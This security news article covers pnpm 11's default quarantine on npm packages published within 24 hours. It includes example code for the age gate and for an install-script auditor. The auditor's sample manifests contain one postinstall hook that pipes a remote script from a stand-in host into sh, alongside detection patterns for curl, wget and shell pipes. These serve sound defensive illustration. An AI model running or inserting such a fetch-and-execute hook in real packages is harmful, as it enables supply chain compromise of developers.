pnpm 11 Defaults to 24-Hour Package Age Minimum: Blocking Automated Post-Publish Supply Chain Attacks

pnpm 11, released this week, introduces a package quarantine feature that by default blocks installation of any npm package published within the past 24 hours. The control targets the automated post-publish compromise pattern used by TeamPCP, CanisterSprawl, and similar supply chain threat actors who publish malicious package versions and immediately trigger mass installation before defenders can respond. It is the most substantive supply-chain-defensive default configuration added to a package manager since npm's provenance attestation.

Tags: pnpm, npm, supply-chain, package-manager, developer-security, open-source, dependency-management, security-defaults

pnpm, the high-performance npm-compatible package manager used by millions of JavaScript developers, has released version 11.0 with a significant security default: packages published to the npm registry within the past 24 hours are quarantined and not installable by default. Developers who need to install a newly published package must explicitly override the quarantine with a flag acknowledging the age of the package.

Why Package Age Is a Security Signal

The 24-hour quarantine targets a specific attack pattern that has been used in multiple high-profile supply chain attacks: automated post-publish compromise, in which an attacker publishes a malicious package (or compromises an existing package and publishes a new malicious version) and relies on the period before detection to maximise installation volume.

The window between a malicious package being published and security tooling being updated to flag it is typically measured in hours. Key examples from recent history:

  • @bitwarden/cli (TeamPCP, April 2026): Malicious version published, approximately 90-minute window before npm removed it, but within that window automated CI/CD systems triggered fresh installs
  • axios v1.14.1 (Sapphire Sleet, March 2026): Three-hour window; automated workflows installing pinned dependencies triggered the compromise
  • SAP @sap namespace (April 2026): 52-hour exposure window, but peak installation velocity was in the first 24 hours

The common thread is that automated CI/CD systems and developer workflows that install packages immediately following publication are the primary amplification mechanism. If no package manager installs a package in the first 24 hours, the attacker gains nothing from rapid publication.

How the Quarantine Works

By default, pnpm 11 checks the _time field in the npm registry metadata for each package being installed. If the latest matching version was published within the past 24 hours, pnpm blocks the installation with an explicit error:

ERR_PNPM_NEW_PACKAGE_RISK Package <name>@<version> was published 2 hours ago.
Installing packages published within 24 hours is blocked by default.
To install anyway: pnpm install --allow-new-packages

The quarantine applies to:

  • Direct dependency installation
  • Transitive dependency resolution when a new version was published within 24 hours
  • pnpm add commands for newly published packages

Configurable period: The 24-hour default can be adjusted in .npmrc via the package-quarantine-days setting. Organisations may choose to extend this to 48 or 72 hours for higher-security environments.

Exemption for pinned versions: Packages explicitly pinned to a specific version hash in pnpm-lock.yaml are exempt from the age check, since the hash verification provides an equivalent guarantee.
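The age gate described in this section, modelled as an added example: this is not pnpm's own code, and pnpm 11's real implementation is not shown on this page. The packument, lockfile entry, .npmrc contents, package name, integrity hash and timestamps are all constructed; the lockfile is represented as a plain object rather than parsed YAML; the package-quarantine-days key and the --allow-new-packages flag are the ones the article names; and the check reads the per-version timestamp from either _time (as the article calls the field) or time (the name the public registry uses). Failing closed when no timestamp exists is a choice made in this example, not something the article states.

```javascript
// Added example: a stand-alone model of the pnpm 11 package-age gate described in the
// article. It is not pnpm's own code; all data below is constructed.
const HOUR_MS = 60 * 60 * 1000;
const DAY_MS = 24 * HOUR_MS;

// Minimal .npmrc reader: `key=value` lines, `#` and `;` comment lines ignored.
function parseNpmrc(text) {
  const config = {};
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith("#") || line.startsWith(";")) continue;
    const eq = line.indexOf("=");
    if (eq > 0) config[line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return config;
}

// Quarantine window: `package-quarantine-days` from .npmrc, otherwise the 24-hour default.
function quarantineWindowMs(config) {
  const days = Number(config["package-quarantine-days"]);
  return Number.isFinite(days) && days > 0 ? days * DAY_MS : DAY_MS;
}

// Publish time of one version from registry metadata. The article calls the field
// `_time`; the public registry serves per-version timestamps under `time`, so both work.
function publishedAt(packument, version) {
  const stamp = (packument._time || packument.time || {})[version];
  return stamp ? Date.parse(stamp) : NaN;
}

function describeAge(ageMs) {
  const hours = Math.floor(ageMs / HOUR_MS);
  if (hours >= 1) return `${hours} hour${hours === 1 ? "" : "s"} ago`;
  const minutes = Math.floor(ageMs / 60000);
  return `${minutes} minute${minutes === 1 ? "" : "s"} ago`;
}

// The gate. Returns { allowed, reason, message }; `message` mirrors the article's error text.
function checkNewPackageRisk({ packument, version, lockfile, config = {}, allowNewPackages = false, now = Date.now() }) {
  const spec = `${packument.name}@${version}`;
  // Exemption: a version pinned with an integrity hash in the lockfile skips the age check.
  const locked = lockfile && lockfile.packages ? lockfile.packages[spec] : undefined;
  if (locked && locked.resolution && locked.resolution.integrity) {
    return { allowed: true, reason: "pinned-in-lockfile", message: "" };
  }
  const publishedMs = publishedAt(packument, version);
  if (Number.isNaN(publishedMs)) {
    // Design choice in this example (the article does not say what pnpm does): fail closed.
    return { allowed: false, reason: "no-publish-time",
      message: `ERR_PNPM_NEW_PACKAGE_RISK Package ${spec} has no publish timestamp in registry metadata.` };
  }
  const ageMs = now - publishedMs;
  const windowMs = quarantineWindowMs(config);
  if (ageMs >= windowMs) return { allowed: true, reason: "older-than-window", message: "" };
  if (allowNewPackages) return { allowed: true, reason: "override-flag", message: "" };
  const message = [
    `ERR_PNPM_NEW_PACKAGE_RISK Package ${spec} was published ${describeAge(ageMs)}.`,
    `Installing packages published within ${Math.round(windowMs / HOUR_MS)} hours is blocked by default.`,
    "To install anyway: pnpm install --allow-new-packages",
  ].join("\n");
  return { allowed: false, reason: "too-new", message };
}

// Constructed sample data: a fictional package, a placeholder integrity hash, a fixed clock.
const NOW = Date.parse("2026-04-02T13:10:00.000Z");
const samplePackument = {
  name: "example-lib",
  "dist-tags": { latest: "2.3.1" },
  time: {
    "2.3.0": "2026-04-01T11:10:00.000Z", // 26 hours before NOW
    "2.3.1": "2026-04-02T11:10:00.000Z", // 2 hours before NOW
  },
};
const sampleLockfile = { packages: { "example-lib@2.3.1": { resolution: { integrity: "sha512-PLACEHOLDER" } } } };
const defaultConfig = parseNpmrc("# no quarantine override\n");
const strictConfig = parseNpmrc("# 72-hour quarantine for CI runners\npackage-quarantine-days=3\n");

// Five scenarios: fresh version, day-old version at 24h and at 72h, lockfile exemption, override flag.
function demo() {
  const base = { packument: samplePackument, config: defaultConfig, now: NOW };
  return {
    freshDefault: checkNewPackageRisk({ ...base, version: "2.3.1" }),
    dayOldDefault: checkNewPackageRisk({ ...base, version: "2.3.0" }),
    dayOldStrict: checkNewPackageRisk({ ...base, version: "2.3.0", config: strictConfig }),
    freshPinned: checkNewPackageRisk({ ...base, version: "2.3.1", lockfile: sampleLockfile }),
    freshOverride: checkNewPackageRisk({ ...base, version: "2.3.1", allowNewPackages: true }),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, result] of Object.entries(demo())) {
    console.log(`${label}: ${result.allowed ? "allowed" : "BLOCKED"} (${result.reason})`);
    if (result.message) console.log(result.message);
  }
}
```

Running the file with node prints one verdict per scenario. The day-old version shows the effect of the configurable window: it passes the 24-hour default but is blocked once package-quarantine-days is raised to 3, which is the setting an organisation would pick for the 72-hour quarantine the article suggests for CI runners.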

Additional Security Defaults in pnpm 11

The quarantine feature is the most significant new security control, but pnpm 11 includes two additional supply-chain-relevant defaults:

Exotic sub-dependency blocking: pnpm 11 by default blocks installation of packages from non-standard registries when they appear as transitive dependencies, preventing dependency confusion attacks where an internal package name is squatted on the public npm registry.

Install script auditing: pnpm 11 logs all preinstall, install, and postinstall scripts that execute during dependency installation, providing an audit trail for supply chain security reviews.
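A small scanner that produces the kind of audit trail described above, as an added example that is not pnpm's logging code. It reads constructed package.json manifests (the file paths, package names and script commands are made up; the command under leftpad-plus is a deliberately suspicious sample so the indicators have something to match), records every preinstall, install and postinstall hook, marks packages on an assumed reviewer allowlist, and attaches review indicators that are this example's own heuristics, not pnpm's rules.

```javascript
// Added example of the install-script audit trail: not pnpm's logging code. It scans
// constructed package.json manifests and records every lifecycle hook it finds.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

// Illustrative review indicators for this example (assumed heuristics, not pnpm's rules).
const INDICATORS = [
  { id: "remote-fetch", pattern: /\b(curl|wget)\b/ },
  { id: "inline-eval", pattern: /\bnode\s+(-e|--eval)\b/ },
  { id: "shell-pipe", pattern: /\|\s*(sh|bash)\b/ },
  { id: "encoded-payload", pattern: /\b(base64|atob)\b/ },
];

// One audit entry per (package, hook). `allowlist` is an assumed list of package names
// whose build scripts the team has reviewed and expects to run.
function auditLifecycleScripts(manifests, allowlist = []) {
  const allowed = new Set(allowlist);
  const entries = [];
  for (const { path, manifest } of manifests) {
    const scripts = manifest.scripts || {};
    for (const hook of LIFECYCLE_HOOKS) {
      const command = scripts[hook];
      if (typeof command !== "string" || !command.trim()) continue;
      entries.push({
        package: `${manifest.name}@${manifest.version}`,
        path,
        hook,
        command,
        allowlisted: allowed.has(manifest.name),
        flags: INDICATORS.filter((i) => i.pattern.test(command)).map((i) => i.id),
      });
    }
  }
  return entries;
}

// Render entries as one log line each, suitable for a CI artifact or SIEM ingestion.
function formatAuditLog(entries) {
  return entries.map((e) => {
    const status = e.allowlisted ? "allowlisted" : e.flags.length ? `review:${e.flags.join(",")}` : "logged";
    return `[lifecycle] ${e.package} ${e.hook} (${status}) ${e.path}: ${e.command}`;
  });
}

// Constructed manifests standing in for node_modules/*/package.json. The leftpad-plus
// hook is a deliberately suspicious sample so the indicators have something to match.
const sampleManifests = [
  { path: "node_modules/native-addon/package.json",
    manifest: { name: "native-addon", version: "3.1.0", scripts: { install: "node-gyp rebuild" } } },
  { path: "node_modules/tiny-util/package.json",
    manifest: { name: "tiny-util", version: "1.0.2" } },
  { path: "node_modules/build-tool/package.json",
    manifest: { name: "build-tool", version: "2.0.0", scripts: { preinstall: "node scripts/check-engine.js", test: "jest" } } },
  { path: "node_modules/leftpad-plus/package.json",
    manifest: { name: "leftpad-plus", version: "0.9.0", scripts: { postinstall: "curl -s https://example.invalid/setup.sh | sh" } } },
];

// Audit the sample tree with native-addon as the only allowlisted build script.
function demoAudit() {
  return auditLifecycleScripts(sampleManifests, ["native-addon"]);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const line of formatAuditLog(demoAudit())) console.log(line);
}
```

Every hook is logged regardless of status, which is the property an audit trail needs: the allowlist and the indicators only change how a reviewer prioritises the lines, never whether a hook appears in the record.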

Implications for Enterprises Using pnpm

For organisations using pnpm in their JavaScript development and CI/CD pipelines:

Upgrade to pnpm 11: The quarantine feature’s value compounds with adoption. CI/CD pipelines running pnpm install are the primary beneficiaries: they run on schedules that may execute a fresh install within hours of a malicious package being published.

Configure the quarantine period: Evaluate whether 24 hours is appropriate or whether a longer quarantine (48–72 hours) better matches your organisation’s security requirements and development cadence.

Test the override workflow: Developers occasionally need to install freshly published packages for legitimate reasons (a patch they are waiting for, a package they maintain themselves). Ensure your teams know the override flag and that there is a documented process for legitimate exceptions.

The 24-hour quarantine is a pragmatic, immediately deployable supply chain defence. It will not prevent attacks that operate on a timescale longer than 24 hours, but it eliminates the zero-hour publication window that has been the most exploited attack vector in npm supply chain attacks. Adopting pnpm 11 is one of the most concrete supply chain defence improvements a JavaScript development team can make this week.
